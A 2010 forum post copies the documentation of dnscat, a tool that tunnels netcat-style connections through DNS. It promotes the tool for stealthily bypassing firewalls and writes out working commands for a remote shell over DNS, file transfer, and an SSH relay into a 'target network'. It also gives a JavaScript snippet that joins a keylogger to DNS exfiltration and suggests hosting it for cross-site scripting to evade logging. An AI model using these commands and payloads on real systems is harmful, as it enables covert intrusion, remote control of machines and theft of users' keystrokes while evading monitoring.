begood Posted March 19, 2010 Report Posted March 19, 2010 (edited) Introdnscat is designed in the spirit of netcat, allowing two hosts over the Internet to talk to each other. The major difference between dnscat and netcat, however, is that dnscat routes all traffic through the local (or a chosen) DNS server. This has several major advantages: * Bypasses pretty much all network firewalls * Bypasses many local firewalls * Doesn't pass through the typical gateway/proxy and therefore is stealthy There are a lot of advantages to using the DNS protocol. There are, of course, several disadvantages as well: * Data has to be encoded into alpha-numeric (DNS allows letters (not case sensitive) and numbers) * DNS is slow -- it's not a direct connection * The possibility of annoying DNS providers with the amount of traffic being sent through them * dnscat requires the listener to be an authoritative DNS server The last point is very important. To actually receive DNS traffic, you require either: 1. An authoritative nameserver, preferably one that isn't being used for anything else. This is what I'll be assuming for the rest of the documentation (see the next section for far more information) 2. The ability to connect to the dnscat server on udp/53 from the client (use the --dns flag to set the address) -- this is far less interesting, but will be faster if it works One of the key netcat-like components of dnscat is the -e (or --exec) argument, which runs a program (such as /bin/sh or cmd.exe) and redirects its input and output through the connection. The --exec flag can be used on the client or server.dnscat has been tested on, in alphabetical order: * FreeBSD 7.2 * FreeBSD 8.0 * FreeBSD 8.0 amd4 * Mac OS X 10.4 (I think) * Slackware 13 * Slackware 13-64 * Windows 2000 * Windows 2003 * Windows XP It should work on any modern version of Linux, FreeBSD, or Windows. To start a dnscat server, use the following command line:dnscat --listenTo start a dnscat client, use this command line:dnscat --domain <domain>For example:dnscat --domain skullseclabs.orgYou can also specify the DNS server to use, if the correct one wasn't chosen by using the --dns argument or if you don't have an authoritative nameserver and you want to make a direct UDP/53 connection:dnscat --domain skullseclabs.org --dns 4.2.2.1Remember that the server has to be the authoritative nameserver for the domain given by the client, unless the --dns entry points directly to the dnscat server.For more options, use --help:dnscat --helpRemote shellTypically, to tunnel a shell over DNS, you're going to want to run a standard server as before:dnscat --listenAnd run the shell on the client side:Linux/BSD:dnscat --domain skullseclabs.org --exec "/bin/sh"Windows:dnscat.exe --domain skullseclabs.org --exec "cmd.exe"On the server, you can now type commands and they'll run on the client side.Transfer a fileYou can transfer a file to the client from the server like this:Server:dnscat --listen > file.outClient:dnscat --domain <domain> < file.inYou can change the direction that the file goes by switching around the redirects. To transfer from the server to the client, do this:Server:dnscat --listen < file.inClient:dnscat --domain <domain> > file.outA couple things to note: * No integrity checking is performed * There is currently no indication when a transfer is finished Tunnel another connectionThis is my favourite thing to do, and it works really slick. You can use netcat to open a port-to-port tunnel through dnscat. I like this enough that I'm going to add netcat-like arguments in the next version.Let's say that the client can connect to an ssh server on 192.168.2.100. The server is on an entirely different network and normally has no access to 192.168.2.100. The whole situation is a little confusing because we want the dnscat client to connect to the ssh server (presumably, in real life, we'd be able to get a dnscat client on a target network, but not a dnscat server). "client" and "server" are such ancient terms anyways. I prefer to look at them as the sender and the receiver.A diagram might help:ssh client | | (port 1234 via netcat) | vdnscat server ^ | | (DNS server(s)) |dnscat client | | (port 22 via netcat) | vssh serverIt's like a good ol' fashioned double netcat relay. Ed Skoudis would be proud. First, we start the netcat server. The server is going to run netcat, which listens on port 1234:dnscat --listen --exec "nc -l -p 1234"If you connect to that host on port 1234, all data will be forwarded across DNS to the dnscat client.Second, on the client side, dnscat connects to 192.168.2.100 port 22:dnscat --domain skullseclabs.org --exec "nc 192.168.2.100 22"This connects to 192.168.2.100 on port 22. The input/output will both be sent across DNS back to the dnscat server, which will then send the traffic to whomever is connected on TCP/1234.Third and finally, we ssh to our socket:ssh -p 1234 ron@127.0.0.1One thing to note: at the moment, doing this is slooooow. But it works, and it's really, really cool!Web keyloggerThere is an implementation of dnscat in Javascript (jsdnscat) written by Stefan Penner. It's located in the 'samples' folder of nbtool and conists of two libraries, one for keylogging and the other for dnscat. There are several example HTML files for using these, but it really comes down to these lines:<script type='text/javascript' src='js/skullsecurity.all.min.js'></script><script type='text/javascript'> SkullSecurity.jsdnscat.config.host = 'yourdomain.com'; SkullSecurity.keylogger.start(SkullSecurity.jsdnscat.send);</script>Equivalent code can easily be put into a .js file and hosted on your server for easy use with cross-site scripting.The best reason for using this as opposed to traditional avenues for data exfiltration is to get around logging and firewalls -- because dnscat will respond with a localhost record to all A and AAAA requests, the computer doesn't actually send an HTTP request to the network, yet you still get its data. Dnscat - Skull Securitydownload : Dnscat - Skull Securityjsdnscat : http://svn.skullsecurity.org:81/ron/security/nbtool-0.04/samples/jsdnscat/ Edited March 19, 2010 by begood Quote
